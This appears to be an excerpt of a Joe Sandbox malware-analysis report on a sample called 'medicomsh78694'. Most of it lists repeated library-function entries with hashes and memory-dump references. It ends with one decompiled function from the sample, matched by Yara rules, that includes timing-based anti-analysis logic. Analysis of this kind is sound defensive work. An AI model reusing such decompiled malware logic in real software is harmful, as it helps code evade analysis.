                                                                            • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                            • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00BB0048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                            • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                                            • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                            • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00BAF9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                            • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                            • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                            • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00BAF900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                            • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                            • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                            • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00BAFAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                            • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                            • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                            • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00BAFAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                            • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                            • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                            • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00BAFBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                            • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                            • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                            • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00BAFB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                            • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                            • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                            • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00BAFC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                            • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                                            • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                            • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00BAFC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                            • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                            • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                            • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00BAFD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                            • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                            • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                            • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00BAFDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                            • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                            • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                            • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00BAFEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                            • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                                            • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                            • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00BAFED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                            • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                            • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                            • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00BAFFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                            • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                            • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                            • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00BB07AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                            • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                            • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                            • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004088E0, Relevance: .1, Instructions: 92COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 93%
                                                                            			E004088E0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E30(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407040( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041A100( &_v284, 0x104);
						E0041A770( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413E00(E00413DA0(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1a5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407070( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070F0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                                                            0x004088eb
                                                                            0x004088f3
                                                                            0x004088f5
                                                                            0x004088fa
                                                                            0x004088ff
                                                                            0x00408912
                                                                            0x00408917
                                                                            0x00408920
                                                                            0x0040892c
                                                                            0x0040893f
                                                                            0x00408944
                                                                            0x00408947
                                                                            0x00408950
                                                                            0x00408962
                                                                            0x00408967
                                                                            0x0040896c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040896e
                                                                            0x00408972
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00408974
                                                                            0x00000000
                                                                            0x00408972
                                                                            0x00408976
                                                                            0x00408979
                                                                            0x0040897f
                                                                            0x00408981
                                                                            0x0040898c
                                                                            0x00408991
                                                                            0x00408994
                                                                            0x004089a1
                                                                            0x004089ac
                                                                            0x004089ae
                                                                            0x004089b4
                                                                            0x004089b8
                                                                            0x004089bb
                                                                            0x004089bb
                                                                            0x004089c2
                                                                            0x004089c5
                                                                            0x004089ca
                                                                            0x004089d7
                                                                            0x00408906
                                                                            0x00408906
                                                                            0x00408906

                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
